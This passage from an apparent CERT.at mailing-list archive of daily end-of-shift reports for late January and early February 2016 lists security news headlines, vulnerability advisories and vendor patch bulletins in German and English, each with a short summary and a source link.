arbitrary code on the affected machine. --------------------------------------------- http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5302.php *** Austrian Mobile Phone Signature is vulnerable against phishing and MitM attacks *** --------------------------------------------- Talking with various people about the Two Factor Authentication (2FA) which is used in Austria to access public services led to my impression that most people think that the system is really secure. While it is more secure than a simple user/password combination its by far not that secure. In this .. --------------------------------------------- http://robert.penz.name/1224/austrian-mobile-phone-signature-is-vulnerable-… *** Aktuelle Spamwelle (Dridex) *** --------------------------------------------- In den letzten Tagen gibt es vermehrt Berichte darüber, dass die Malware Dridex nach einer kurzen Winterpause wieder verstärkt aktiv ist. --------------------------------------------- http://www.cert.at/services/blog/20160202110607-1661.html *** Cyberbetrug bei FACC: Aktionäre fordern Konsequenzen *** --------------------------------------------- Rasinger: "Das schließt auch personelle Konsequenzen mit ein" – Zeitung: Ablöse von Finanzchefin zu erwarten --------------------------------------------- http://derstandard.at/2000030230502-375 *** Apache verpetzt möglicherweise Tor Hidden Services *** --------------------------------------------- In seiner Standard-Konfiguration liefert der beliebte Web-Server-Dienst Informationen, die die Anonymitäts-Versprechen eines Tor Hidden Services gefährden. Diese anonymen Tor-Dienste sind der Kern des oft zitierten "Dark Net". --------------------------------------------- http://heise.de/-3090218 *** Crash Safari Follow-Up *** --------------------------------------------- It's been a week since short links to crashsafari.com went viral, and Google has finally killed the most prevalent link (goo.gl/78uQHK). More than three-quarters of a million clicks were made before the short link was disabled for violating .. --------------------------------------------- https://labsblog.f-secure.com/2016/02/02/crash-safari-follow-up/ *** A1 kämpft seit Samstag gegen Hackerangriffe *** --------------------------------------------- Ausfälle nach DDoS-Attacken zuerst im mobilen Netz, danach im Festnetz-Internet --------------------------------------------- http://derstandard.at/2000030190051 *** Targeted IPv6 Scans Using pool.ntp.org *** --------------------------------------------- IPv6 poses a problem for systems like Shodan, who try to enumerate vulnerabilities Internet-wide. Tools like zmap can scan the IPv4 internet in minutes (or maybe hours), but for IPv6, the same approach will still fail. The smallest IPv6 subnet is a /64, or 18.4 Quintillion addresses. A tool like zmap would .. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20681 *** Socat Warns Weak Prime Number Could Mean It's Backdoored *** --------------------------------------------- Socat published a security advisory warning users that a hard-coded 1024 Diffie-Hellman prime number was not prime, and that an attacker could listen and recover secrets from a key exchange. --------------------------------------------- http://threatpost.com/socat-warns-weak-prime-number-could-mean-its-backdoor… *** VU#719736: Fisher-Price Smart Toy platform allows some unauthenticated web API commands *** --------------------------------------------- The Fisher-Price Smart Toy bear is a new WiFi-connected Internet of Things (IoT) toy. The device utilizes network connectivity to provide more interactivity with children. --------------------------------------------- http://www.kb.cert.org/vuls/id/719736 *** Top Exploit Kits Round Up January Edition *** --------------------------------------------- A look at the top exploit kits.Categories: ExploitKits(Read more...) --------------------------------------------- https://blog.malwarebytes.org/exploitkits/2016/02/top-exploit-kits-round-up… *** MailPoet Newsletters <= 2.6.19 - Cross-Site Scripting (XSS) *** --------------------------------------------- https://wpvulndb.com/vulnerabilities/8373 *** Hacker wollen bei Nasa eingebrochen sein, um Chemtrails zu beweisen *** --------------------------------------------- Gruppierung "Anonsec" will 250 GB an Daten erbeutet und Kontrolle über eine Drohne übernommen haben --------------------------------------------- http://derstandard.at/2000030242744

1 0

Tageszusammenfassung - Montag 1-02-2016
by Daily end-of-shift report 01 Feb '16

01 Feb '16

======================= = End-of-Shift report = ======================= Timeframe: Freitag 29-01-2016 18:00 − Montag 01-02-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** FreeBSD Linux Support issetugid(2) Error Lets Local Users Gain Elevated Privileges *** --------------------------------------------- The Linux compatibility layer issetugid(2) system call may return incorrect information. A local user may be able to exploit an application that uses this system call to gain elevated privileges. --------------------------------------------- http://www.securitytracker.com/id/1034872 *** QEMU Firmware Configuration Processing Access Flaw Lets Local Users on a Guest System Gain Elevated Privileges on the Host System *** --------------------------------------------- A privileged local user with CAP_SYS_RAWIO capabilities on the guest system can trigger an out-of-bounds read/write access error when processing firmware configurations and cause denial of service conditions or gain elevated privileges on the host system. --------------------------------------------- http://www.securitytracker.com/id/1034858 *** HP integrated Lights Out (iLO) TLS Diffie-Hellman Export Cipher Downgrade Attack Lets Remote Users Decrypt Connections *** --------------------------------------------- A remote user that can conduct a man-in-the-middle attack can cause the target system to downgrade the Diffie-Hellman algorithm to 512-bit export-grade cryptography. The remote user may then be able to decrypt the connection. --------------------------------------------- http://www.securitytracker.com/id/1034884 *** Hippo CMS 10.1 XML External Entity Information Disclosure Vulnerability *** --------------------------------------------- XXE (XML External Entity) processing through upload of SVG images in the CMS, and through XML import in the CMS Console application. --------------------------------------------- http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5301.php *** Hippo CMS 10.1 Stored Cross-Site Scripting Vulnerability *** --------------------------------------------- Hippo CMS suffers from a stored XSS vulnerability. Input passed thru the POST parameters groupname and description is not sanitized allowing the attacker to execute HTML code into users browser session on the affected site. --------------------------------------------- http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5300.php *** HP Client Security Manager 8.3.4 Cross-Site Scripting Vulnerability *** --------------------------------------------- HP Client Security Manager is prone to XSS attacks because of lacking sanitization of data from HTML forms. It makes any site vulnerable even without XSS presence on the site. --------------------------------------------- http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5299.php *** Now VirusTotal can scan your firmware image for bad executables *** --------------------------------------------- VirusTotal presented a new malware scanning engine that allows users to analyze their firmware images searching for malicious codes. VirusTotal has recently announced the launch of a new malware scanning service for firmware .. --------------------------------------------- http://securityaffairs.co/wordpress/44097/malware/virustotal-firmware-scan.… *** 6 Millionen US-Dollar für Sicherheitslücken in Google-Produkten *** --------------------------------------------- Google zeigt sicher weiterhin spendabel, wenn Sicherheitsforscher neue Lücken in Chrome, Android & Co. an den Konzern melden. --------------------------------------------- http://heise.de/-3088182 *** DSA-3460 privoxy - security update *** --------------------------------------------- It was discovered that privoxy, a web proxy with advanced filteringcapabilities, contained invalid reads that could enable a remoteattacker to crash the application, thus causing a Denial of Service. --------------------------------------------- https://www.debian.org/security/2016/dsa-3460 *** Is security outfit Norse Corp dead or just temporarily TITSUP? *** --------------------------------------------- Imploding says Brian Krebs Security startup Norse Corp has gone ominously dark. --------------------------------------------- www.theregister.co.uk/2016/02/01/is_norse_corp_dead_or_just_temporarily_tit… *** LibreSSL emits new versions, says not vulnerable to OpenSSL bug *** --------------------------------------------- Ciscos pedalling hard to prepare patches too Corrected LibreSSL sysadmins should keep an eye on their mirrors for a soon-to-land update. --------------------------------------------- www.theregister.co.uk/2016/02/01/openbsd_rolls_in_libressl_bug_fixes/ *** DSA-3463 prosody - security update *** --------------------------------------------- It was discovered that insecure handling of dialback keys may allowa malicious XMPP server to impersonate another server. --------------------------------------------- https://www.debian.org/security/2016/dsa-3463 *** Schluss mit "123456": 1. Februar ist "Change your password"-Tag *** --------------------------------------------- Zahlreiche Nutzer verwenden noch immer haarsträubend unsichere Passwörter --------------------------------------------- http://derstandard.at/2000030144886 *** Aktuell im Umlauf: Trojaner-Mail im Namen des Kopierers verschickt *** --------------------------------------------- Kriminelle versenden dieser Tage gehäuft E-Mails mit Schadcode im Anhang über gefälschte Absenderadressen von Netzwerk-Kopierern. --------------------------------------------- http://heise.de/-3088536 *** GAME OVER: HOW A COLOURFUL GAME TURNED INTO A SUBSCRIPTION TRAP - App from the Google Play store automatically set up two subscriptions in the Netherlands *** --------------------------------------------- Premium SMS messages were the first attacks on Android users - almost six years ago, malware with this functionality was the primary risk. Since then of course, the malware landscape for mobile devices has moved on significantly. For this very .. --------------------------------------------- https://blog.gdatasoftware.com/blog/article/game-over-how-a-colourful-game-… *** Theres a lot of vulnerable OS X applications out there. *** --------------------------------------------- Lately, I was doing research connected with different updating strategies, and I tested a few applications working under Mac OS X. This short weekend research revealed that we have many insecure applications in the wild. As a result, I have found a vulnerability which allows an attacker take control of another computer on the same network (via MITM). --------------------------------------------- https://vulnsec.com/2016/osx-apps-vulnerabilities/ *** Illegaler Bezahldienst Liberty Reserve: Gründer bekennt sich der Geldwäsche schuldig *** --------------------------------------------- US-Behörden bezeichnen den 2013 abgestellten Onlinedienst Liberty Reserve als "die Bank der Wahl für die kriminelle Unterwelt". Der Gründer hat sich nun schuldig bekannt, über 250 Millionen US-Dollar gewaschen zu haben. --------------------------------------------- http://heise.de/-3088621

1 0

Tageszusammenfassung - Freitag 29-01-2016
by Daily end-of-shift report 29 Jan '16

29 Jan '16

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 28-01-2016 18:00 − Freitag 29-01-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** Elaborate iCloud Phish Used To Activate Stolen iPhones *** --------------------------------------------- Lost your iphone? Beware of messages claiming it was found.Categories: Phishing(Read more...) --------------------------------------------- https://blog.malwarebytes.org/phishing/2016/01/elaborate-icloud-phish-used-… *** New Attacks Linked to C0d0so0 Group *** --------------------------------------------- While recently researching unknown malware and attack campaigns using the AutoFocus threat intelligence platform, Unit 42 discovered new activity that appears related to an adversary group previously called "C0d0so0" or "Codoso". This group is well... --------------------------------------------- http://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0… *** Ein Schlüssel fürs ungesicherte Smart Home *** --------------------------------------------- Experten warnen vor unsicheren Eigenheim-Lösungen, die mit dem Internet verbunden sind. Konsumenten sollten von den Herstellern mehr Sicherheit einfordern. --------------------------------------------- http://futurezone.at/digital-life/ein-schluessel-fuers-ungesicherte-smart-h… *** Trojan targeted dozens of games on Google Play *** --------------------------------------------- January 28, 2016 Doctor Web security researchers detected the Android.Xiny.19.origin Trojan that targeted dozens of games published on the Google Play store. The Trojan is designed to download, install, and run programs upon receiving a command from cybercriminals. Besides, it can display annoying advertisements. The Trojan was incorporated into more than 60 games that were then distributed via Google Play in the names of more than 30 game developers, including Conexagon Studio, Fun Color... --------------------------------------------- http://news.drweb.com/show/?i=9803&lng=en&c=9 *** OpenSSL-Lücke: Die Sache mit den sicheren Primzahlen *** --------------------------------------------- OpenSSL hat mit einem Sicherheitsupdate eine Sicherheitslücke im Diffie-Hellman-Schlüsselaustausch behoben, deren Risiko als "hoch" eingestuft wird. Allerdings dürfte kaum jemand von der Lücke praktisch betroffen sein. --------------------------------------------- http://www.golem.de/news/openssl-luecke-die-sache-mit-den-sicheren-primzahl… *** Auto mit bösartigem Lied gekapert *** --------------------------------------------- Ein Sicherheitsforscher, der bereits 2010 eine kritische Lücke in einem Automobil-System entdeckte, hat nun erklärt, wie sie funktioniert: mit Schadcode, der in einem Song versteckt wurde. Auch heute sind ähnliche Angriffe noch immer denkbar. --------------------------------------------- http://heise.de/-3087160 *** 27% of all malware variants in history were created in 2015 *** --------------------------------------------- Last year was a record year for malware, according to a new report from Panda Security, with more than 84 million new malware samples collected over the course of the year.That averages out to around 230,000 new malware samples a day, said Luis Corrons, technical director of Pandas PandaLabs unit. Or 27 percent of all malware ever created.Trojans continued to account for the main bulk of malware, at 51.45 percent, followed by viruses at 22.79 percent, worms at 13.22 percent, potentially... --------------------------------------------- http://www.cio.com/article/3027621/cyber-attacks-espionage/27-of-all-malwar… *** From Linux to Windows - New Family of Cross-Platform Desktop Backdoors Discovered *** --------------------------------------------- Background Recently we came across a new family of cross-platform backdoors for desktop environments. First we got the Linux variant, and with information extracted from its binary, we were able to find the variant for Windows desktops, too. Not only... --------------------------------------------- http://securelist.com/blog/research/73503/from-linux-to-windows-new-family-… *** Guest talk: "Hidden GEMs: Automated Discovery of Access Control Vulnerabilities in Graphical User Interfaces" *** --------------------------------------------- February 02, 2016 - 11:00 am - 12:00 pm SBA Research Favoritenstraße 16 1040 Wien --------------------------------------------- https://www.sba-research.org/events/guest-talk-hidden-gems-automated-discov… *** Security Advisory: Linux kernel vulnerability CVE-2015-7509 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/73/sol73189318.html?… *** DSA-3459 mysql-5.5 - security update *** --------------------------------------------- Several issues have been discovered in the MySQL database server. Thevulnerabilities are addressed by upgrading MySQL to the new upstreamversion 5.5.47. Please see the MySQL 5.5 Release Notes and OraclesCritical Patch Update advisory for further details: --------------------------------------------- https://www.debian.org/security/2016/dsa-3459 *** Westermo Industrial Switch Hard-coded Certificate Vulnerability *** --------------------------------------------- This advisory contains mitigation details for a hard-coded certificate vulnerability in Westermo's industrial switches. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-028-01 *** JBoss Data Virtualization Object Deserialization FlawLets Remote Users Execute Arbitrary Code on the Target System *** --------------------------------------------- http://www.securitytracker.com/id/1034815 *** Cisco Small Business 500 Series Switches Denial of Service Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco Unity Connection User Search Cross-Site Scripting Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Multiple Vulnerabilities in OpenSSL (January 2016) Affecting Cisco Products *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** nginx DNS Processing Flaws Let Remote Users Deny Service *** --------------------------------------------- http://www.securitytracker.com/id/1034869 *** Bugtraq: ProjectSend multiple vulnerabilities *** --------------------------------------------- http://www.securityfocus.com/archive/1/537402 *** Telegram (API) Cross Site Request Forgery *** --------------------------------------------- Topic: Telegram (API) Cross Site Request Forgery Risk: Medium Text:Document Title: Telegram (API) - Cross Site Request Forgery Vulnerabilities References (Source): == http:/... --------------------------------------------- https://cxsecurity.com/issue/WLB-2016010208 *** HP Security Bulletins *** --------------------------------------------- *** HPSBGN03542 rev.1 - HPE Operations Manager for Windows using Java Deserialization, Remote Arbitrary Code Execution *** https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04953244 --------------------------------------------- *** HPSBHF03539 rev.1 - HPE VCX running OpenSSH or BIND, Remote Denial of Service (DoS) *** https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04952480 --------------------------------------------- *** HPSBOV03540 rev.1 - HPE OpenVMS TCPIP Bind Services and OpenVMS TCPIP IPC Services for OpenVMS, Remote Disclosure of Information, Execution of Code, Denial of Service (DoS) *** https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04952488 --------------------------------------------- *** HPSBHF03510 rev.1 - HP Integrated Lights-Out 2/3/4, Remote Unauthorized Modification *** https://h20566.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04949778 --------------------------------------------- *** Bugtraq: [security bulletin] HPSBHF03538 rev.1 - HPE iMC Service Health Manager (SHM) and iMC PLAT running Adobe Flash, Remote Code Execution, Denial of Service (DoS) *** http://www.securityfocus.com/archive/1/537401 --------------------------------------------- *** Bugtraq: [security bulletin] HPSBHF03535 rev.3 - HPE iMC Service Health Manager (SHM) and iMC PLAT running Adobe Flash, Multiple Remote Vulnerabilities *** http://www.securityfocus.com/archive/1/537400 --------------------------------------------- *** Novell Patches *** --------------------------------------------- *** IDM 4.5 Engine & Remote Loader Service Pack 3 4.5.3 *** https://download.novell.com/Download?buildid=Rjs_0SapjGg~ --------------------------------------------- *** IDM 4.5 Identity Applications 4.5.3 *** https://download.novell.com/Download?buildid=N63wVOwZf_s~ --------------------------------------------- *** NetIQ Identity Manager Service Pack 3 - Designer 4.5.3 *** https://download.novell.com/Download?buildid=QgHXVOxv310~ --------------------------------------------- *** iManager 2.7 Support Pack 7 - Patch 6 for Windows *** https://download.novell.com/Download?buildid=RYH_EkORvU4~ --------------------------------------------- *** eDirectory 8.8 SP8 Patch 7 for Linux *** https://download.novell.com/Download?buildid=l6ulyqWxDv8~ --------------------------------------------- *** eDirectory 8.8 SP8 Patch 7 for Windows *** https://download.novell.com/Download?buildid=HTund35qCFk~ --------------------------------------------- *** eDirectory 8.8 SP8 Patch 7 (non-root) for Linux *** https://download.novell.com/Download?buildid=Drw3BqUXIo4~ --------------------------------------------- *** iManager 2.7 Support Pack 7 - Patch 6 for Linux *** https://download.novell.com/Download?buildid=E9m024HXLHw~ ---------------------------------------------

1 0

Tageszusammenfassung - Donnerstag 28-01-2016
by Daily end-of-shift report 28 Jan '16

28 Jan '16

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 27-01-2016 18:00 − Donnerstag 28-01-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** Googles VirusTotal now picks out suspicious firmware *** --------------------------------------------- Googles VirusTotal service has added a new tool that analyzes firmware, the low-level code that bridges a computers hardware and operating system at startup.Advanced attackers, including the U.S. National Security Agency, have targeted firmware as a place to embed malware since its a great place to hide. Since antivirus programs "are not scanning this layer, the compromise can fly under the radar," wrote Francisco Santos, an IT security engineer with VirusTotal, in a blog post on... --------------------------------------------- http://www.cio.com/article/3027050/googles-virustotal-now-picks-out-suspici… *** Critical Israel power grid attack was just boring ransomware *** --------------------------------------------- Minister puts nation on alert, SANS Institute says move along, nothing to see here ... The SANS Institute has moved to quell reports that Israels energy grid has been hit by malware, revealing instead that the attacks were ransomware infecting the nations utility regulatory authority. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/01/28/israel_powe… *** ENISA Threat Landscape 2015, a must reading *** --------------------------------------------- ENISA has issued the annual ENISA Threat Landscape 2015 a document that synthesizes the emerging trends in cyber security I'm very happy to announce the publication of the annual ENISA Threat Landscape 2015 (ETL 2015), this is the fifth report issued by the European Agency. The ENISA Threat Landscape 2015 summarizes top cyber threats, experts have identified... --------------------------------------------- http://securityaffairs.co/wordpress/43998/cyber-crime/enisa-threat-landscap… *** Techie on the ground disputes BlackEnergy Ukraine power outage story *** --------------------------------------------- And Russia? Thats too convenient A Ukrainian telecoms engineer has raised doubts about the widely reported link between BlackEnergy attacks and power outages in his country. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/01/27/ukraine_bla… *** BlackEnergy APT Attacks in Ukraine employ spearphishing with Word documents *** --------------------------------------------- Few days ago, we came by a new document that appears to be part of the ongoing attacks BlackEnergy against Ukraine. Unlike previous Office files used in the recent attacks, this is not an Excel workbook, but a Microsoft Word document. --------------------------------------------- http://securelist.com/blog/research/73440/blackenergy-apt-attacks-in-ukrain… *** Java Serialization Bug Crops Up At PayPal *** --------------------------------------------- PayPal has rewarded two researchers with bug bounties for the discovery of a Java serialization vulnerability in manager.paypal.com --------------------------------------------- http://threatpost.com/java-serialization-bug-crops-up-at-paypal/116054/ *** LG closes data-theft hole affecting millions of G3 smartphones *** --------------------------------------------- Bug allows attackers to embed malicious code in data fed to phone. --------------------------------------------- http://arstechnica.com/security/2016/01/lg-closes-data-theft-hole-affecting… *** Oracle announces Java plugin deprecation, death *** --------------------------------------------- With a short post by a member of the Java strategy team, Oracle has announced the approaching death of the hated Java plugin. "Oracle plans to deprecate the Java browser plugin in JDK 9. This techn... --------------------------------------------- http://www.net-security.org/secworld.php?id=19385 *** DFN-CERT-2016-0166: OpenSSL: Zwei Schwachstellen ermöglichen das Umgehen von Sicherheitsmechanismen und das Ausspähen von Informationen *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0166/ *** Bugtraq: Netgear GS105Ev2 - Multiple Vulnerabilities *** --------------------------------------------- http://www.securityfocus.com/archive/1/537389 *** Cisco Unity Connection Web Framework Cross-Site Scripting Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Multiple Vulnerabilities in Network Time Protocol Daemon Affecting Cisco Products - January 2016 *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Security Advisory: IPSec vulnerability CVE-2015-4047 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/05/sol05013313.html?… *** Filr 1.2 - Security Update 1 *** --------------------------------------------- Abstract: Security Updates for openSSH on the Filr, Search and MySQL 1.2.0 appliances.Document ID: 5233830Security Alert: YesDistribution Type: PublicEntitlement Required: NoFiles:MySQL-1.2.0.412.HP.zip (763.81 kB)Filr-1.2.0.857.HP.zip (763.86 kB)Search-1.2.0.996.HP.zip (763.83 kB)Products:Filr 1.2Superceded Patches: None --------------------------------------------- https://download.novell.com/Download?buildid=Sww_cAfKic0~ *** Filr 1.1 - Security Update 5 *** --------------------------------------------- Abstract: Security Updates for openSSH on the Filr, Search and MySQL 1.1.0 appliances.Document ID: 5233810Security Alert: YesDistribution Type: PublicEntitlement Required: NoFiles:MySQL-1.1.0.386.HP.zip (763.82 kB)Search-1.1.0.823.HP.zip (763.83 kB)Filr-1.1.0.677.HP.zip (763.91 kB)Products:Filr 1.1Superceded Patches: None --------------------------------------------- https://download.novell.com/Download?buildid=GGjGx_IhcY4~ *** phpMyAdmin 4.5.4, 4.4.15.3, and 4.0.10.13 are released *** --------------------------------------------- Welcome to phpMyAdmin 4.5.4, which contains regular bug fixes and a number of security fixes. The phpMyAdmin project also announces the release of versions 4.4.15.3 (a security release compatible with PHP versions as old as 5.3.7 and MySQL 5.5), and 4.0.10.13 (a security release compatible with PHP versions as old as 5.2 and MySQL 5). The security incidents will be documented in the upcoming PMASA-2016-1 through PMASA-2016-9, which will be available shortly at --------------------------------------------- https://www.phpmyadmin.net/news/2016/1/28/phpmyadmin-454-44153-and-401013-a… *** Bugtraq: HCA0005 - Liberty Global - Horizon HD STB - predictable WiFi passphrase *** --------------------------------------------- http://www.securityfocus.com/archive/1/537395 *** Bugtraq: Trend Micro Direct Pass - Filter Bypass & Persistent Web Vulnerability *** --------------------------------------------- http://www.securityfocus.com/archive/1/537396

1 0

Tageszusammenfassung - Mittwoch 27-01-2016
by Daily end-of-shift report 27 Jan '16

27 Jan '16

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 26-01-2016 18:00 − Mittwoch 27-01-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** BGP Route Hijacking - An Overview *** --------------------------------------------- BGP is the mechanism by which autonomous networks exchange "reachability" information between each other. A network with an assigned or allocated prefix of addresses "advertises" the block of addresses to a neighboring BGP speaking router, this is known as BGP peering. There is little hiding what BGP peering networks announce between each other. When two networks are reasonably small, and their assigned prefixes are limited and well known, enforcement of announcements... --------------------------------------------- https://blog.team-cymru.org/2016/01/bgp-route-hijacking-an-overview/ *** More Fake Facebook "Security System Page" Scams *** --------------------------------------------- We take a look at some variations on the same kind of Facebook scam currently doing the rounds.Categories: Fraud/Scam AlertTags: facebookphishphishingscam(Read more...) --------------------------------------------- https://blog.malwarebytes.org/fraud-scam/2016/01/more-fake-facebook-securit… *** If youre one of millions using Magento - stop whatever youre doing and patch now *** --------------------------------------------- Ecommerce websites can be hijacked via critical flaw A huge security hole has been found in popular ecommerce platform Magento, requiring an immediate update. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/01/26/urgent_mage… *** New Magic ransomware abuses open-source educational code *** --------------------------------------------- Malware based on open-source code, created for educational purposes only, has been spotted in the wild by Bleeping Computers Lawrence Abrams. --------------------------------------------- http://www.scmagazine.com/new-magic-ransomware-abuses-open-source-education… *** Verschlüsselung: IETF standardisiert zwei weitere elliptische Kurven *** --------------------------------------------- Die IETF hat die beiden elliptischen Kurven Curve25519 und Curve448 als RFC für Krypto-Funktionen offiziell abgesegnet. Eine Standardisierung der Kurven für den Schlüsselaustausch bei TLS wird ebenfalls erwartet. --------------------------------------------- http://heise.de/-3084830 *** Security: Wenn der Drucker zum anonymen Fileserver wird *** --------------------------------------------- Sicherheitsprobleme liegen oft bei den Anwendern von IT-Produkten. In einem aktuellen Fall zeigt ein Sicherheitsforscher, dass Angreifer auf ungeschützten Netzwerkdruckern von Hewlett-Packard anonym Dateien ablegen können. --------------------------------------------- http://www.golem.de/news/security-wenn-der-drucker-zum-anonymen-fileserver-… *** The Rising Sophistication of Network Scanning *** --------------------------------------------- In this article I would like to show you a hidden system that is hard at work scanning thousands, maybe millions, of unsuspecting devices. And Ill show how this system efficiently harvests each devices personal IP address and hands it off to a scanner, which proceeds to run a port/security scan against each unsuspecting victim for vulnerabilities. --------------------------------------------- http://netpatterns.blogspot.co.uk/2016/01/the-rising-sophistication-of-netw… *** SQL Injection Analysis *** --------------------------------------------- It is one thing to be able to execute a simple SQL injection attack; it is another to do a proper investigation of such an attack. Unfortunately, there is not much information on SQL Injection analysis. This article will assist in providing some tools for basic Incident Response. It can be fairly easily translated to... --------------------------------------------- http://resources.infosecinstitute.com/sql-injection-analysis/ *** RuhrSec 2016 - supported by SBA Research *** --------------------------------------------- April 28, 2016 - April 29, 2016 - All Day Veranstaltungszentrum, Ruhr-Universität Bochum Universitätsstraße 150 Bochum --------------------------------------------- https://www.sba-research.org/events/ruhrsec-2016/ *** TP-Link-Router mit vorhersehbarem Standard-WLAN-Passwort *** --------------------------------------------- Angreifer können das werkseitige WLAN-Passwort von einer TP-Link-Router-Serie vergleichsweise einfach herausfinden und sich so Zugang zum Netzwerk verschaffen. Weitere Serien könnten ebenfalls betroffen sein. --------------------------------------------- http://heise.de/-3085482 *** Apple can read your iMessages despite them being encrypted *** --------------------------------------------- Despite Apple taking a pro-encryption stance, with its CEO Tim Cook insisting that iMessages are safely encrypted, it turns out that if users backup data using iCloud Backup, they need to be aware that although Apple stores the backup in encrypted form, it uses its own key. --------------------------------------------- http://www.scmagazine.com/apple-can-read-your-imessages-despite-them-being-… *** Bugtraq: [security bulletin] HPSBGN03537 rev.1 - HPE IceWall Federation Agent and IceWall File Manager running libXML2, Remote or Local Denial of Service (DoS) *** --------------------------------------------- http://www.securityfocus.com/archive/1/537368 *** Bugtraq: [security bulletin] HPSBGN03536 rev.1 - HP IceWall Products running OpenSSL, Remote and Local Denial of Service (DoS) *** --------------------------------------------- http://www.securityfocus.com/archive/1/537367 *** pfSense Firewall 2.2.5 Cross Site Request Forgery *** --------------------------------------------- Topic: pfSense Firewall 2.2.5 Cross Site Request Forgery Risk: Low Text:<!-- # Exploit Title: pfSense Firewall 2.2.5 Cross-Site Request Forgery # Date: 23-01-2016 # Software Link: http://mirror.a... --------------------------------------------- https://cxsecurity.com/issue/WLB-2016010178 *** Cisco Small Business SG300 Managed Switch Web Framework GUI Function Denial of Service Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco RV220W Management Authentication Bypass Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco Wide Area Application Service CIFS Denial of Service Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** MICROSYS PROMOTIC Memory Corruption Vulnerability *** --------------------------------------------- This advisory contains mitigation details for a memory corruption vulnerability in the MICROSYS, spol. s r.o. PROMOTIC application. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-026-01 *** Rockwell Automation MicroLogix 1100 PLC Overflow Vulnerability *** --------------------------------------------- This advisory contains mitigation details for a stack-based buffer overflow vulnerability in Rockwell Automation's Allen-Bradley MicroLogix 1100 programmable logic controller systems. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-026-02 *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in OpenSSH affect IBM MQ Appliance (CVE-2016-0777) *** http://www.ibm.com/support/docview.wss?uid=swg21975158 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in the GSKit component of Communications Server for Data Center Deployment, AIX, Linux, System z, and Windows (CVE-2016-0201) *** http://www.ibm.com/support/docview.wss?uid=swg21974589 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in the GSKit component of Content Manager Enterprise Edition (CVE-2016-0201) *** http://www.ibm.com/support/docview.wss?uid=swg21974700 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in the GSKit component of IBM Content Collector for SAP Applications (CVE-2016-0201) *** http://www.ibm.com/support/docview.wss?uid=swg21974333 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in the GSKit component of IBM Sterling Connect:Direct for Microsoft Windows (CVE-2016-0201) *** http://www.ibm.com/support/docview.wss?uid=swg21974407 --------------------------------------------- *** IBM Security Bulletin: A vulnerability has been addressed in the GSKit component of IBM Security Directory Server (CVE-2016-0201) *** http://www.ibm.com/support/docview.wss?uid=swg21975404 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in the GSKit component of IBM Personal Communications (CVE-2016-0201) *** http://www.ibm.com/support/docview.wss?uid=swg21974947 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in openssl affect Power Hardware Management Console (CVE-2015-3193, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196, CVE-2015-1794) *** http://www.ibm.com/support/docview.wss?uid=nas8N1021091 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in Apache Commons affects IBM Kenexa LMS along with IBM Kenexa Participate, IBM Kenexa LCMS on Cloud (CVE-2015-7450) *** http://www.ibm.com/support/docview.wss?uid=swg21972995 --------------------------------------------- *** IBM Security Bulletin: Security Bulletin: Vulnerabilities in Java affect Power Hardware Management Console (CVE-2015-4843 CVE-2015-4868 CVE-2015-4806 CVE-2015-4872 CVE-2015-4911 CVE-2015-4893 CVE-2015-4842 CVE-2015-4803) *** http://www.ibm.com/support/docview.wss?uid=nas8N1021090 --------------------------------------------- *** IBM Security Bulletin: Two vulnerabilities exist in IBM Case Foundation and FileNet Business Process Manager (CVE-2012-5784 and CVE-2014-3596) *** http://www.ibm.com/support/docview.wss?uid=swg21965451 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM MQ Appliance (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21974599 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects RIT and RTCP in Rational Test Workbench, RTCP and RIT Agent in Rational Test 